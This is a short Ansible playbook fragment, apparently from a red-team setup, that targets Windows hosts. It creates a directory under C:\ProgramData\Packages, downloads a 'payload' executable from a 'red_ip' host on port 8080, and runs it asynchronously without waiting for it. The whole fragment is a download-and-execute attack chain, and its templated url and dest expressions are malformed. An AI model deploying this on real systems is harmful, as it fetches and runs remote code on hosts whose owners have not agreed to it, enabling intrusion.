- name: Create Location on host
  ansible.windows.win_file:
    path: C:\ProgramData\Packages\
    state: directory

- name: Download payload to host
  ansible.windows.win_get_url:
    url: {{'http://', red_ip, ':8080/', red_executable}}
    dest: {{C:\ProgramData\Packages\, red_executable}}
    
- name: Execute payload on host
  ansible.windows.win_command: C:\ProgramData\Packages\{{red_executable}}
  async: 10
  poll: 0
